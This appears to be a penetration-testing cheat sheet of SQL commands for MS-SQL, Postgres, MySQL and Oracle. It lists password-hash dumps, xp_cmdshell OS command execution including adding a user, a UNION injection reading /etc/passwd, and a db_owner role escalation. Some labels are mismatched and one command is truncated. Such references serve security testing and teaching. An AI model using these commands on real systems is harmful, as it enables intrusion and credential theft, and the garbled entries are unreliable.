Databases

Database

Ms-sql

Command

Description

SELECT @@version

Database version

EXEC xp_msver

version details

EXEC master..xp_cmdshell 'net user'

Run operating system command (xp_cmdshell is disabled by default and has to be enabled by a sysadmin)

SELECT HOST_NAME()

Get Hostname and IP

SELECT DB_NAME()

Current database

SELECT name FROM master..sysdatabases;

List of databases

SELECT user_name()

Current user

SELECT name FROM master..syslogins

List of users

SELECT name FROM master..sysobjects WHERE xtype= 'U';

list of tables

SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable');

List of columns

Information about all database tables in the system table

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

List of tables and columns

SELECT name FROM Syscolumns WHERE id =
(SELECT id FROM Sysobjects WHERE
name='mytable')

Password hash

SELECT name, password_hash FROM master.sys.sql_logins

Bypass user access level

execute('execute(''alter role [db_owner] add member [client]'') at "compatibility\poo_public"')

Postgres

Command

Explanation

SELECT version();

Database version

SELECT inet_server_addr()

Get Hostname and IP

SELECT current_database();

Current database

SELECT datname FROM pg_database;

List of databases

SELECT user;

Current user

SELECT usename FROM pg_user;

List of users

SELECT usename,passwd FROM pg_shadow

List of password hashes

column list

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum > 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

List of tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND
pg_catalog.pg_table_is_visible(c.oid)

Mysql

Command

Explanation

SELECT @@version;

Database version

SELECT @@hostname;

Get Hostname and IP

SELECT database();

Current database

SELECT distinct (db) FROM mysql.db;

List of databases

SELECT user();

Current user

SELECT user FROM mysql.user;

List of users

SELECT host,user,password FROM mysql.user;

Password hash list

List of all tables and columns

SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE
table_schema != 'mysql' AND table_schema != 'information_schema'

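Execution of operating system command in mysql (note: the example below uses osql and xp_cmdshell, which belong to Microsoft SQL Server rather than MySQL, and the command is cut off in this copy)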

osql -S ip , port -U sa -P pwd -Q "exec xp cmdshell `net user /add user
passr

Reading readable files in mysql (requires the FILE privilege and is limited by the secure_file_priv setting)

UNION ALL SELECT LOAD_FILE('/etc/passwd');

Writing to the file system in mysql (requires the FILE privilege and is limited by the secure_file_priv setting)

SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Oracle

Command

Explanation

SELECT * FROM v$version;

Database version

SELECT version FROM v$instance;

Database version

SELECT instance_name FROM v$instance;

Current database

SELECT name FROM v$database;

Current database

SELECT DISTINCT owner FROM all_tables;

List of databases

SELECT user FROM dual;

Current user

SELECT username FROM all_users ORDER BY username;

List of users

SELECT column_name FROM all_tab_columns;

List of columns

SELECT table_name FROM all_tables;

list of tables

SELECT name, password, astatus FROM sys.user$;

List of password hashes

List of databases

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
